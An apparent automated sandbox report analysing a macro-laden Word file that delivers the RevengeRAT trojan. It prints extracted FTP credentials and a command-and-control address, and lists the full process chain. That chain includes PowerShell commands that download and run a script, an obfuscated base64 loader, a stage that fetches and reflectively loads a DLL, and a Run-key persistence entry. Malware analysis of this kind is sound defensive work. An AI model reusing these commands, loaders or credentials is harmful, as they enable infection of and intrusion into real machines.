Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23/09/2024, 17:38
Static task
static1
Behavioral task
behavioral1
Sample
27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
Resource
win10v2004-20240802-en
General
-
Target
27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
-
Size
124KB
-
MD5
cc0f9cc1f9133b0f5dd045a34b2d7ae1
-
SHA1
c41f1c79442c0e2b717473f9c40d395176afffdb
-
SHA256
27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696
-
SHA512
154c2ddc43ba72e1f166dc025e20ef5c580e1f490f1828496c1f10f8ef17b4432137740c66552d12cb647499e9ad7d5a62e5ab709ed2bcd9d08d2416b475c3da
-
SSDEEP
1536:vkc9anle9tQVTGH7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuBXFtc:vVWqQVtClwH9r0l77AnsSmy/BVtqxp
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Extracted
revengerat
NyanCatRevenge
marcelotatuape.ddns.net:333
b25e533944db469
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3640 1624 powershell.exe 81 -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 55 3640 powershell.exe 57 3640 powershell.exe 61 4320 powershell.exe 63 4320 powershell.exe 65 4320 powershell.exe 68 4320 powershell.exe 70 4320 powershell.exe 71 4320 powershell.exe 74 568 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_r = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\lngbo.ps1' \";exit" powershell.exe -
pid Process 64 powershell.exe 4320 powershell.exe 3592 powershell.exe 568 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 73 pastebin.com 74 pastebin.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 568 set thread context of 1996 568 powershell.exe 106 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1624 WINWORD.EXE 1624 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3640 powershell.exe 3640 powershell.exe 64 powershell.exe 64 powershell.exe 4320 powershell.exe 4320 powershell.exe 4320 powershell.exe 3592 powershell.exe 3592 powershell.exe 568 powershell.exe 568 powershell.exe 568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3640 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeDebugPrivilege 4320 powershell.exe Token: SeDebugPrivilege 3592 powershell.exe Token: SeDebugPrivilege 568 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1624 WINWORD.EXE 1624 WINWORD.EXE 1624 WINWORD.EXE 1624 WINWORD.EXE 1624 WINWORD.EXE 1624 WINWORD.EXE 1624 WINWORD.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1624 wrote to memory of 3640 1624 WINWORD.EXE 94 PID 1624 wrote to memory of 3640 1624 WINWORD.EXE 94 PID 3640 wrote to memory of 1964 3640 powershell.exe 97 PID 3640 wrote to memory of 1964 3640 powershell.exe 97 PID 4316 wrote to memory of 2076 4316 explorer.exe 99 PID 4316 wrote to memory of 2076 4316 explorer.exe 99 PID 2076 wrote to memory of 64 2076 WScript.exe 100 PID 2076 wrote to memory of 64 2076 WScript.exe 100 PID 64 wrote to memory of 4320 64 powershell.exe 102 PID 64 wrote to memory of 4320 64 powershell.exe 102 PID 4320 wrote to memory of 3592 4320 powershell.exe 103 PID 4320 wrote to memory of 3592 4320 powershell.exe 103 PID 4320 wrote to memory of 568 4320 powershell.exe 104 PID 4320 wrote to memory of 568 4320 powershell.exe 104 PID 4320 wrote to memory of 3684 4320 powershell.exe 105 PID 4320 wrote to memory of 3684 4320 powershell.exe 105 PID 568 wrote to memory of 1996 568 powershell.exe 106 PID 568 wrote to memory of 1996 568 powershell.exe 106 PID 568 wrote to memory of 1996 568 powershell.exe 106 PID 568 wrote to memory of 1996 568 powershell.exe 106 PID 568 wrote to memory of 1996 568 powershell.exe 106 PID 568 wrote to memory of 1996 568 powershell.exe 106 PID 568 wrote to memory of 1996 568 powershell.exe 106 PID 568 wrote to memory of 1996 568 powershell.exe 106
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/CE3CTlT9/DlRvs8N_.dc5ccedf8d8817fc5fe4f69239307383 -o test.js; explorer.exe test.js2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" test.js3⤵PID:1964
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿pAFUAbg㍿KAGEAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAaQ㍿VAG4ASg㍿hACAAKQAgAHsAJA㍿NAGkAUg㍿JAGQAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAcw㍿CAGkAaQ㍿XACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAcw㍿CAGkAaQ㍿XACAAKQAgAHsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAKAAkAFIAWQ㍿FAGEARgAgACsAIAAnADEATg㍿hAHEAZA㍿OAFgAaQ㍿HAHYASQ㍿fAHEAMQ㍿SAFAAaw㍿hAHoARg㍿0AE0AeQ㍿nAG0AYQ㍿xAFQASg㍿YAHUANAAyACcAKQAgADsAfQ㍿lAGwAcw㍿lACAAewAkAFIAWQ㍿FAGEARgAgAD0AIAAoACQAUg㍿ZAEUAYQ㍿GACAAKwAgACcAMQ㍿nADEAag㍿tAFgAdQ㍿zAFgAOQ㍿tAGMAOQ㍿WAG0AaA㍿WAHIASg㍿KADIAWA㍿vAGYAWgAzAGEASw㍿fAGMATA㍿PAHQAJwApACAAOw㍿9ADsAJA㍿JAGEAbw㍿NAGkAIAA9ACAAKAAgAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACAAKQAgADsAJA㍿JAGEAbw㍿NAGkALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAgADsAJA㍿JAGEAbw㍿NAGkALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApACAAOwAkAEEAVQ㍿yAEcARgAgAD0AIAAoACAAJw㍿DADoAXA㍿VAHMAZQ㍿yAHMAXAAnACAAKwAgAFsARQ㍿uAHYAaQ㍿yAG8Abg㍿tAGUAbg㍿0AF0AOgA6AFUAcw㍿lAHIATg㍿hAG0AZQAgACkAOw㍿JAHoAag㍿㍿AFEAIAA9ACAAKAAgACQATQ㍿pAFIASQ㍿kACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACAAKQAgADsAIA㍿wAG8Adw㍿lAHIAcw㍿oAGUAbA㍿sAC4AZQ㍿4AGUAIA㍿3AHUAcw㍿hAC4AZQ㍿4AGUAIA㍿JAHoAag㍿㍿AFEAIAAvAHEAdQ㍿pAGUAdAAgAC8Abg㍿vAHIAZQ㍿zAHQAYQ㍿yAHQAIAA7ACAAQw㍿vAHAAeQAtAEkAdA㍿lAG0AIAAnACUARA㍿DAFAASg㍿VACUAJwAgAC0ARA㍿lAHMAdA㍿pAG4AYQ㍿0AGkAbw㍿uACAAKAAgACQAQQ㍿VAHIARw㍿GACAAKwAgACcAXA㍿㍿AHAAcA㍿EAGEAdA㍿hAFwAUg㍿vAGEAbQ㍿pAG4AZw㍿cAE0AaQ㍿jAHIAbw㍿zAG8AZg㍿0AFwAVw㍿pAG4AZA㍿vAHcAcw㍿cAFMAdA㍿hAHIAdAAgAE0AZQ㍿uAHUAXA㍿QAHIAbw㍿nAHIAYQ㍿tAHMAXA㍿TAHQAYQ㍿yAHQAdQ㍿wACcAIAApACAALQ㍿mAG8Acg㍿jAGUAIAA7AHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7ACAAcw㍿oAHUAdA㍿kAG8Adw㍿uAC4AZQ㍿4AGUAIAAvAHIAIAAvAHQAIAAwACAALw㍿mACAAfQ㍿lAGwAcw㍿lACAAew㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿yAHYAZQ㍿yAEMAZQ㍿yAHQAaQ㍿mAGkAYw㍿hAHQAZQ㍿WAGEAbA㍿pAGQAYQ㍿0AGkAbw㍿uAEMAYQ㍿sAGwAYg㍿hAGMAawAgAD0AIA㍿7ACQAdA㍿yAHUAZQ㍿9ADsAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAVA㍿5AHAAZQ㍿dADoAOg㍿UAGwAcwAxADIAOwAkAFIAeg㍿XAFcAcgAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAFIAeg㍿XAFcAcgAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿SAHoAVw㍿XAHIALg㍿DAHIAZQ㍿kAGUAbg㍿0AGkAYQ㍿sAHMAIAA9ACAAbg㍿lAHcALQ㍿vAGIAag㍿lAGMAdAAgAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿OAGUAdA㍿3AG8Acg㍿rAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAKAAnAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQAnACwAJw㍿kAGUAdg㍿lAGwAbw㍿wAGUAcg㍿wAHIAbwAyADEANQA3ADgASg㍿wAEAAQAAnACkAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAFIAeg㍿XAFcAcgAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿TAHQAcg㍿pAG4AZwAoACAAJw㍿mAHQAcAA6AC8ALw㍿kAGUAcw㍿jAGsAdg㍿iAHIAYQ㍿0ADEAQA㍿mAHQAcAAuAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQALg㍿jAG8AbQAuAGIAcgAvAFUAcA㍿jAHIAeQ㍿wAHQAZQ㍿yAC8AMAAyAC8ARA㍿MAEwAMAAxAC4AdA㍿4AHQAJwAgACkAOwAkAFIAeg㍿XAFcAcgAuAGQAaQ㍿zAHAAbw㍿zAGUAKAApADsAJA㍿SAHoAVw㍿XAHIAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿SAHoAVw㍿XAHIALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAA7ACQAVg㍿0AGEAQQ㍿GACAAPQAgACQAUg㍿6AFcAVw㍿yAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAgACkAOw㍿bAEIAeQ㍿0AGUAWw㍿dAF0AIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQw㍿vAG4Adg㍿lAHIAdA㍿dADoAOg㍿GAHIAbw㍿tAEIAYQ㍿zAGUANgA0AFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAuAFIAZQ㍿wAGwAYQ㍿jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw㍿TAHkAcw㍿0AGUAbQAuAEEAcA㍿wAEQAbw㍿tAGEAaQ㍿uAF0AOgA6AEMAdQ㍿yAHIAZQ㍿uAHQARA㍿vAG0AYQ㍿pAG4ALg㍿MAG8AYQ㍿kACgAIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgACkALg㍿HAGUAdA㍿UAHkAcA㍿lACgAIAAnAEMAbA㍿hAHMAcw㍿MAGkAYg㍿yAGEAcg㍿5ADMALg㍿DAGwAYQ㍿zAHMAMQAnACAAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAIAAnAHAAcg㍿GAFYASQAnACAAKQAuAEkAbg㍿2AG8Aaw㍿lACgAJA㍿uAHUAbA㍿sACwAIA㍿bAG8AYg㍿qAGUAYw㍿0AFsAXQ㍿dACAAKAAgACcAMgAyACUAOQA2AGMAOAA1ADMANgA1ADYAYgAwADYAYQA1ADYAOA㍿kAGIAMg㍿jADIAMQ㍿hAGUANg㍿jAGIAYgAyADEANQ㍿iADIAMgAlAD0AdgAmAGQAYQ㍿vAGwAbg㍿3AG8AZAA9AGUAYw㍿yAHUAbw㍿zACYAdA㍿4AHQALg㍿0AHgAdAA3ADIAJQA3ADIAJQA4AC0ARg㍿UAFUARAAzACUAQQAyACUAZQ㍿tAGEAbg㍿lAGwAaQ㍿mACsAQgAzACUAMgAyACUAdA㍿4AHQALg㍿0AHgAdAAyADIAJQ㍿EADMAJQ㍿lAG0AYQ㍿uAGUAbA㍿pAGYAKw㍿CADMAJQ㍿0AG4AZQ㍿tAGgAYw㍿hAHQAdA㍿hAD0Abg㍿vAGkAdA㍿pAHMAbw㍿wAHMAaQ㍿kAC0AdA㍿uAGUAdA㍿uAG8AYwAtAGUAcw㍿uAG8AcA㍿zAGUAcgA/AHQAeA㍿0AC4AYwA4ADgANgA3ADAANQAwADAANAA1AGMALQAwAGMANw㍿hAC0AMgA4ADkANAAtAGIAMg㍿hADIALQA2ADMAOQAxAGUAZAAyAGQALw㍿nAHAARQ㍿XAEoAdQ㍿RAHgALw㍿zAG0AZQ㍿0AGkALw㍿tAG8AYwAuAHQAaA㍿nAGkAegAuAG4AZA㍿jAC4AMA㍿uAC4AMQ㍿yAHQALgA3AHAALwAvADoAcw㍿wAHQAdA㍿oACcAIAAsACAAJwAlAEQAQw㍿QAEoAVQAlACcALAAgACcAdA㍿yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $fLbjh3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$iUnJa = $host.Version.Major.Equals(2);If ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = ( New-Object Net.WebClient ) ;$IaoMi.Encoding = [System.Text.Encoding]::UTF8 ;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$RzWWr.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$VtaAF = $RzWWr.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$RzWWr.dispose();$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $RzWWr.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%96c853656b06a568db2c21ae6cbb215b22%=v&daolnwod=ecruos&txt.txt72%72%8-FTUD3%A2%emanelif+B3%22%txt.txt22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.c8867050045c-0c7a-2894-b2a2-6391ed2d/gpEWJuQx/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );};"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"5⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\lngbo.ps1"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1996
-
-
-
C:\Windows\system32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"5⤵PID:3684
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
132KB
MD55d6acf998701782dbc41e3cca20839ae
SHA18fa365fd0df099df35d06bc9178d435ad2a9f472
SHA256e9732ebc6fee2eee5b41a6ab019c68acf833204545cfe8e51b9f5df910e9c40f
SHA5129da884483ae247825a9c5cca776cfe8674efae433ad82d17bbcef21349be1e9c51ca0101c5858be0deee5f1ccb72042ddecbfbd2523c34ab617cad15cb10fe93
-
Filesize
334B
MD580df14ed28f6bdea4bd049a6d865b97e
SHA1715dca5ecc3260c153d5e953cdc45be5a98e24b6
SHA2564ae4ca4102c4a50bad8663d8e1911a2b5c6c4eb8ebc7dcb46bf77418efddec16
SHA5128bfd60b774c966c8db42d0f66d9e1f13d074c201bbaf68b7c09f547485043033372e19696b53a82e5c6ee8eb2aad0a07173dd5ae58058f17bc574c57035a52e7
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
1KB
MD5c1fca2f86da013ab0bebd174f313ee72
SHA1d6b6a8f5d6d9979893254cea76f7031ba5438391
SHA25679f112792c2d79cd64d73d4510168f0dbe7d5a40877c6c305863c0a473dc01f9
SHA512e5f2f2a6f4387d857b72cc44351e3e63b4d04958af6a269502f6ae5e5d68a5f9c3d9c9457dd1cbc99e080f858697df7430bed130b009f6fc133dbadf1df758be
-
Filesize
64B
MD587441260b5caf10b43d9846ab2240740
SHA1f28038d1042410969b1b15aee5dd5f1ef6632688
SHA256186739f88588b68b398f84fd90e920e8faa68306e582970256572573595b4610
SHA51208fecb974f914e8b4ca37abcefb5a1473c9eb6ac558477ab94895ce19b20c7228807ecee1282cf21f1282cafd8d2a50ea06935b12488345204e5d201b651fefc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
12KB
MD51fb86474569cb04bd88f9421f0928f51
SHA17c9f86002055e8468dd14da6dc4c63f03ac8e4a7
SHA2567f34301509d6975851c1cffedbce7b05b5e3549e2dbdd7f0f4a6dfa5900d83b1
SHA5123e24ab6ae2bdbd0729a1ee0aeba249dbaa94e0655d893662dd2b63ee030d2e043b79f324c743eaa6c8508140496021aa11e8d94c70e5cda89da725ce12aeda0f
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD51e7a0c0f85c6e3fbd2b26c2e3af83a8e
SHA1e0dd300100c3ccc94bdb2f67900af9f879ffc936
SHA25689d7d6ffee09dcd2b3e9df93eedae098ec0e5e34f3326b3fbc5fc46c6ca5a92c
SHA5128f3eab8562e16f901b9aa2f21306d135e7b562586333a2111b2ce738c730424d194e8a8091e2fdde5a087b8c829625438d3ecca35a961bad900360ffe4a9acc4